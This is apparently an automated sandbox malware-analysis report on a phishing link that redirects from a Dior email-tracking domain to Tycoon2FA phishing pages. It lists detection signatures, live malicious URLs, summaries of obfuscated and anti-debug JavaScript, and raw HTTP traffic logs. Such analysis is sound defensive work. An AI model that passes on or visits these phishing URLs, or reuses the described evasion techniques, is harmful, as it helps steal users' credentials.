Edit tour

Windows Analysis Report
http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&

Overview

General Information

Sample URL:http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5z
Analysis ID:1642816
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,9831878234390128474,8964339834726454301,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_71JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.11..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      1.7.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        1.7.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          1.6.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            1.6.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 9 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js?Avira URL Cloud: Label: phishing
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21Avira URL Cloud: Label: phishing
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/favicon.icoAvira URL Cloud: Label: phishing
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/?cf_captcha=verifiedAvira URL Cloud: Label: phishing
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/cdn-cgi/challenge-platform/scripts/jsd/main.jsAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_71, type: DROPPED
              Source: Yara matchFile source: 1.6.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: 1.6.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.7.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.7.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.pages.csv, type: HTML
              Source: Yara matchFile source: 1.6.pages.csv, type: HTML
              Source: 1.7.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting browser automation tools, blocking keyboard shortcuts and right-click functionality, and using a debugger trap to redirect the user to an external website. These behaviors are highly suspicious and indicate potential malicious intent, likely to bypass security measures or perform unauthorized actions.
              Source: 1.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://yg.dianausil.com/IDLK/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain, which further increases the risk. Overall, this script exhibits a high level of suspicious and potentially harmful activity, warranting a high-risk score.
              Source: 1.6.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behavior, including dynamic code execution through the use of `eval()`. It also appears to be heavily obfuscated, which further increases the risk. The script's purpose is unclear, and it is likely to be malicious in nature.
              Source: https://yg.dianausil.com/IDLK/#contactHTTP Parser: Number of links: 0
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/HTTP Parser: Base64 decoded: 1742380194.000000
              Source: https://yg.dianausil.com/IDLK/#contactHTTP Parser: Title: Portfolio & Agency - Modern Design does not match URL
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/HTTP Parser: No favicon
              Source: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/HTTP Parser: No favicon
              Source: https://yg.dianausil.com/IDLK/#contactHTTP Parser: No favicon
              Source: https://yg.dianausil.com/IDLK/#contactHTTP Parser: No <meta name="author".. found
              Source: https://yg.dianausil.com/IDLK/#contactHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 172.217.16.132:443 -> 192.168.2.6:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.102.239.211:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.5.130:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.214.184:443 -> 192.168.2.6:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.6:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.6:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.6:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.6:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.6:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.6:55744 version: TLS 1.2
              Source: global trafficTCP traffic: 192.168.2.6:55741 -> 162.159.36.2:53
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: email.mg.dior.com.sg to http://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
              Source: unknownTCP traffic detected without corresponding DNS query: 95.101.79.131
              Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88& HTTP/1.1Host: email.mg.dior.com.sgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js? HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=922c4a999a2565e0&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/0.38274867399469387:1742376653:KH8maKPuUqiEMLR5OlzLIk_YKRD4m2JdO_m0T_WtFio/922c4a9648889f21 HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=qNs1iY1VvRH90Ldoq1yEk.IxYRRXaV.XjHDpBJskUl4-1742380194-1.2.1.1-6JCfidD2ac1ldlMQ_J35HHpOaB1R2Qfd77afpZZaY6L38WJnRgGF3HbJn2.e_YfjrnLq4AbcuviEtgLFLi6GxCSB8fAreovMFHBRH6Kx8RGKvrKCYyQfc8HfmhPxpGL2V7RM3EsgKJOLmnmy1Isw5_Vffq.FczWDL_75R6f2X0vx5NM4V4Bns8PxfX1tyunl3.moUgvDLgJ5359Rrbq327WTEaCVdGApZaHTZmOf2cDxSH5swKuN_8jCjL4biGArDXjPSayB0.RkwzX9HXl6OgpoNmb9_5CaiJINx7tyLyG9UPpR0yTi7d3NcTC9QiBUu0H7HmviVAp6BwdbyYbgI1CAcAcGxz7hqx4aE5i64jA
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/922c4a999a2565e0/1742380195700/ox5WbSDMgn24l14 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/922c4a999a2565e0/1742380195702/13a2904f9ce012e84732ed91b64145029ca303305d8e5d33f08cbc9075eb3842/89GlKLJ1vXuz6E7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/966088071:1742376849:e-pQSDz4Bmg_iVm7Jg9F7dZQ1GSaY_NvFcx7L8UKqvA/922c4a999a2565e0/bwElmkdodDWQOGj80U6g0vbisR.D21TPXcrcLoLH45I-1742380194-1.1.1.1-abhJq1qSwZwA3Vl_tW6mw1yQmgoQwbtMA82LndI9lmWZgSxh0FEP4lOMhDDG8mQT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /?cf_captcha=verified HTTP/1.1Host: a6b7c1be5ea686d6c0c05e957.alkitipo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 